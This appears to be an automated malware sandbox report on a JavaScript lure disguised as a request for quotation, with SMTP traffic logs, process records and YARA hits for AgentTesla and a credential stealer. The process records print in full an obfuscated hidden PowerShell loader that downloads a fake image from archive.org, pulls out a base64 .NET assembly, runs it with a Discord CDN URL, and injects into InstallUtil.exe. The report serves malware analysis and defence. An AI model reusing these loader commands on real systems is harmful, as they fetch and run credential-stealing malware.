Expires: Wed, 27 Aug 2025 05:53:45 GMT
Last-Modified: Mon, 26 Aug 2024 16:15:44 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1724688944981728
x-goog-hash: crc32c=kOzxwg==
x-goog-hash: md5=ePJb/4S5G7UnAhQtBh14Nw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 334508
x-guploader-uploadid: AHxI1nPoAVd1JDGVKTS7LsvZMhrp7Yb2f3Hrl1LGh3eMsYSlGFZMJzIX2belgIYbcp8vro1R4w
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=7s7etQRQQMe2_ff6E1ssF_dmMcLlBvPdEa70g1Bg3hU-1724738025-1.0.1.1-1Z4qaA81e5JrIfafs8gbqxWQQStwbu3XST3e4IUDQnVq.5m9iU4MAmUVL0gnYs_B7dPofocFTbUF_C6u2gogjg; path=/; expires=Tue, 27-Aug-24 06:23:45 GMT; domain=.discordapp.com; HttpOnly; Secure


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Aug 27, 2024 07:53:49.107600927 CEST | 587 | 49707 | 185.230.212.164 | 192.168.2.5 | 220 mx.zoho.eu SMTP Server ready August 27, 2024 7:53:48 AM CEST
Aug 27, 2024 07:53:49.108108044 CEST | 49707 | 587 | 192.168.2.5 | 185.230.212.164 | EHLO 045012
Aug 27, 2024 07:53:49.404326916 CEST | 587 | 49707 | 185.230.212.164 | 192.168.2.5 | 250-mx.zoho.eu Hello 045012 (8.46.123.33 (8.46.123.33))
                                                                                      250-STARTTLS
                                                                                      250 SIZE 53477376
Aug 27, 2024 07:53:49.434470892 CEST | 49707 | 587 | 192.168.2.5 | 185.230.212.164 | STARTTLS
Aug 27, 2024 07:53:49.610611916 CEST | 587 | 49707 | 185.230.212.164 | 192.168.2.5 | 220 Ready to start TLS.
Aug 27, 2024 07:53:52.821928978 CEST | 587 | 49708 | 185.230.212.164 | 192.168.2.5 | 220 mx.zoho.eu SMTP Server ready August 27, 2024 7:53:52 AM CEST
Aug 27, 2024 07:53:52.822129965 CEST | 49708 | 587 | 192.168.2.5 | 185.230.212.164 | EHLO 045012
Aug 27, 2024 07:53:53.002490044 CEST | 587 | 49708 | 185.230.212.164 | 192.168.2.5 | 250-mx.zoho.eu Hello 045012 (8.46.123.33 (8.46.123.33))
                                                                                      250-STARTTLS
Aug 27, 2024 07:53:53.133933067 CEST | 587 | 49708 | 185.230.212.164 | 192.168.2.5 | 250 SIZE 53477376
Aug 27, 2024 07:53:53.134187937 CEST | 49708 | 587 | 192.168.2.5 | 185.230.212.164 | STARTTLS
Aug 27, 2024 07:53:53.312863111 CEST | 587 | 49708 | 185.230.212.164 | 192.168.2.5 | 220 Ready to start TLS.

                                                Target ID:0
                                                Start time:01:53:37
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js"
                                                Imagebase:0x7ff613d40000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:01:53:38
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? 
G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ? GU? ? ? ? e? ? ? ? B0? ? ? ? C4? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? E8? ? ? ? Zg? ? ? ? o? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? ZQBu? ? ? ? GQ? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? FQ? ? ? ? ZQB4? ? ? ? HQ? ? ? ? LgBJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? TwBm? ? ? ? Cg? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BG? ? ? ? Gw? ? ? ? YQBn? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? HM? ? ? ? d? ? ? ? Bh? ? ? ? HI? ? ? ? d? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? Gc? ? ? ? ZQ? ? ? ? g? ? ? ? D? ? ? ? ? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? GE? ? ? ? bgBk? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? Gc? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? CQ? ? ? ? cwB0? 
? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? Cs? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? LgBM? ? ? ? GU? ? ? ? bgBn? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? YgBh? ? ? ? HM? ? ? ? ZQ? ? ? ? 2? ? ? ? DQ? ? ? ? T? ? ? ? Bl? ? ? ? G4? ? ? ? ZwB0? ? ? ? Gg? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bz? ? ? ? HQ? ? ? ? YQBy? ? ? ? HQ? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? Ds? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BD? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? FQ? ? ? ? ZQB4? ? ? ? HQ? ? ? ? LgBT? ? ? ? HU? ? ? ? YgBz? ? ? ? HQ? ? ? ? cgBp? ? ? ? G4? ? ? ? Zw? ? ? ? o? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? s? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BM? ? ? ? GU? ? ? ? bgBn? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bj? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? QwBv? ? ? ? G4? ? ? ? dgBl? ? ? ? HI? ? ? ? d? ? ? ? Bd? ? ? ? Do? ? ? ? OgBG? ? ? ? HI? ? ? ? bwBt? ? ? ? EI? ? ? ? YQBz? ? ? ? GU? ? ? ? Ng? ? ? ? 0? ? ? ? FM? ? ? ? d? ? ? ? By? ? ? ? Gk? ? ? ? bgBn? ? ? ? Cg? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BD? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? Gw? ? ? ? bwBh? ? ? ? GQ? ? ? ? ZQBk? ? ? ? EE? ? ? ? cwBz? ? ? ? GU? ? ? ? bQBi? ? ? ? Gw? ? ? ? eQ? ? ? ? g? ? ? ? D0? ? 
? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? UgBl? ? ? ? GY? ? ? ? b? ? ? ? Bl? ? ? ? GM? ? ? ? d? ? ? ? Bp? ? ? ? G8? ? ? ? bg? ? ? ? u? ? ? ? EE? ? ? ? cwBz? ? ? ? GU? ? ? ? bQBi? ? ? ? Gw? ? ? ? eQBd? ? ? ? Do? ? ? ? OgBM? ? ? ? G8? ? ? ? YQBk? ? ? ? Cg? ? ? ? J? ? ? ? Bj? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? B0? ? ? ? Hk? ? ? ? c? ? ? ? Bl? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? b? ? ? ? Bv? ? ? ? GE? ? ? ? Z? ? ? ? Bl? ? ? ? GQ? ? ? ? QQBz? ? ? ? HM? ? ? ? ZQBt? ? ? ? GI? ? ? ? b? ? ? ? B5? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? V? ? ? ? B5? ? ? ? H? ? ? ? ? ? ? ? ZQ? ? ? ? o? ? ? ? Cc? ? ? ? Z? ? ? ? Bu? ? ? ? Gw? ? ? ? aQBi? ? ? ? C4? ? ? ? SQBP? ? ? ? C4? ? ? ? S? ? ? ? Bv? ? ? ? G0? ? ? ? ZQ? ? ? ? n? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? G0? ? ? ? ZQB0? ? ? ? Gg? ? ? ? bwBk? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? d? ? ? ? B5? ? ? ? H? ? ? ? ? ? ? ? ZQ? ? ? ? u? ? ? ? Ec? ? ? ? ZQB0? ? ? ? E0? ? ? ? ZQB0? ? ? ? Gg? ? ? ? bwBk? ? ? ? Cg? ? ? ? JwBW? ? ? ? EE? ? ? ? SQ? ? ? ? n? ? ? ? Ck? ? ? ? LgBJ? ? ? ? G4? ? ? ? dgBv? ? ? ? Gs? ? ? ? ZQ? ? ? ? o? ? ? ? CQ? ? ? ? bgB1? ? ? ? Gw? ? ? ? b? ? ? ? ? ? ? ? s? ? ? ? C? ? ? ? ? ? ? ? WwBv? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? Bb? ? ? ? F0? ? ? ? XQ? ? ? ? g? ? ? ? Cg? ? ? ? Jw? ? ? ? m? ? ? ? GY? ? ? ? O? ? ? ? ? ? ? ? x? ? ? ? DU? ? ? ? ZQ? ? ? ? 1? ? ? ? GY? ? ? ? Yg? ? ? ? 3? ? ? ? DQ? ? ? ? OQ? ? ? ? x? ? ? ? D? ? ? ? ? ? ? ? NgBm? ? ? ? DI? ? ? ? MQ? ? ? ? 3? ? ? ? DI? ? ? ? OQBj? ? ? ? DU? ? ? ? O? ? ? ? Bl? ? ? ? GU? ? ? ? OQBk? ? ? ? DU? ? ? ? Z? ? ? ? ? ? ? ? 0? ? ? ? DM? ? ? ? Ng? ? ? ? y? ? ? ? GY? ? ? ? MQ? ? ? ? x? ? ? ? DM? ? ? ? Z? ? ? ? ? ? ? ? 5? ? ? ? GQ? ? ? ? YgBj? ? ? ? DY? ? ? ? OQBl? ? ? ? Dc? ? ? ? MgBl? ? ? ? D? ? ? ? ? ? ? ? Yg? ? ? ? 2? ? ? ? DQ? ? ? ? Yg? ? ? ? z? ? ? ? GM? ? ? ? M? ? ? ? ? ? ? ? 0? ? ? ? GM? ? ? ? NQ? ? ? ? 3? ? ? ? DQ? ? 
? ? Yw? ? ? ? x? ? ? ? GQ? ? ? ? PQBt? ? ? ? Gg? ? ? ? Jg? ? ? ? w? ? ? ? DM? ? ? ? YQBh? ? ? ? GM? ? ? ? Yw? ? ? ? 2? ? ? ? DY? ? ? ? PQBz? ? ? ? Gk? ? ? ? Jg? ? ? ? w? ? ? ? GI? ? ? ? YgBm? ? ? ? GQ? ? ? ? Yw? ? ? ? 2? ? ? ? DY? ? ? ? PQB4? ? ? ? GU? ? ? ? PwB0? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? Ec? ? ? ? SQBS? ? ? ? E8? ? ? ? Lw? ? ? ? 5? ? ? ? DI? ? ? ? O? ? ? ? ? ? ? ? y? ? ? ? DU? ? ? ? NQ? ? ? ? 5? ? ? ? DE? ? ? ? N? ? ? ? ? ? ? ? x? ? ? ? Dg? ? ? ? Nw? ? ? ? y? ? ? ? DY? ? ? ? Ng? ? ? ? 3? ? ? ? Dc? ? ? ? Mg? ? ? ? x? ? ? ? C8? ? ? ? OQ? ? ? ? 1? ? ? ? DQ? ? ? ? Nw? ? ? ? 1? ? ? ? DE? ? ? ? Mw? ? ? ? 5? ? ? ? D? ? ? ? ? ? ? ? M? ? ? ? ? ? ? ? 4? ? ? ? DE? ? ? ? Mw? ? ? ? z? ? ? ? DQ? ? ? ? Nw? ? ? ? 3? ? ? ? DI? ? ? ? MQ? ? ? ? v? ? ? ? HM? ? ? ? d? ? ? ? Bu? ? ? ? GU? ? ? ? bQBo? ? ? ? GM? ? ? ? YQB0? ? ? ? HQ? ? ? ? YQ? ? ? ? v? ? ? ? G0? ? ? ? bwBj? ? ? ? C4? ? ? ? c? ? ? ? Bw? ? ? ? GE? ? ? ? Z? ? ? ? By? ? ? ? G8? ? ? ? YwBz? ? ? ? Gk? ? ? ? Z? ? ? ? ? ? ? ? u? ? ? ? G4? ? ? ? Z? ? ? ? Bj? ? ? ? C8? ? ? ? Lw? ? ? ? 6? ? ? ? HM? ? ? ? c? ? ? ? B0? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? n? ? ? ? C? ? ? ? ? ? ? ? L? ? ? ? ? ? ? ? g? ? ? ? Cc? ? ? ? MQ? ? ? ? n? ? ? ? C? ? ? ? ? ? ? ? L? ? ? ? ? ? ? ? g? ? ? ? Cc? ? ? ? Qw? ? ? ? 6? ? ? ? Fw? ? ? ? U? ? ? ? By? ? ? ? G8? ? ? ? ZwBy? ? ? ? GE? ? ? ? bQBE? ? ? ? GE? ? ? ? d? ? ? ? Bh? ? ? ? Fw? ? ? ? Jw? ? ? ? g? ? ? ? Cw? ? ? ? I? ? ? ? ? ? ? ? n? ? ? ? H? ? ? ? ? ? ? ? YQBk? ? ? ? HI? ? ? ? YQBs? ? ? ? Cc? ? ? ? L? ? ? ? ? ? ? ? n? ? ? ? Ek? ? ? ? bgBz? ? ? ? HQ? ? ? ? YQBs? ? ? ? Gw? ? ? ? VQB0? ? ? ? Gk? ? ? ? b? ? ? ? ? ? ? ? n? ? ? ? Cw? ? ? ? JwBk? ? ? ? GU? ? ? ? cwBh? ? ? ? HQ? ? ? ? aQB2? ? ? ? GE? ? ? ? Z? ? ? ? Bv? ? ? ? Cc? ? ? ? KQ? ? ? ? p? ? ? ? ? ? ? ? ==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:01:53:38
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:4
                                                Start time:01:53:40
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:01:53:43
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"
                                                Imagebase:0x7ff6275a0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:01:53:43
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:01:53:45
                                                Start date:27/08/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x2e0000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:8
                                                Start time:01:53:45
                                                Start date:27/08/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x4e0000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3317780029.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3317780029.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2177996236.00007FF848D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff848d20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction ID: 7cb42642e1da3d82757d21bc541deb7dc345a0ebc5e7e05edc84e6195f5ece29
                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction Fuzzy Hash: B801447111CB094FDB48EF0CE451AA6B7E0FB95364F10056DE58AC3665D736E882CB46

                                                  Execution Graph

                                                  Execution Coverage:8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:27
                                                  Total number of Limit Nodes:1
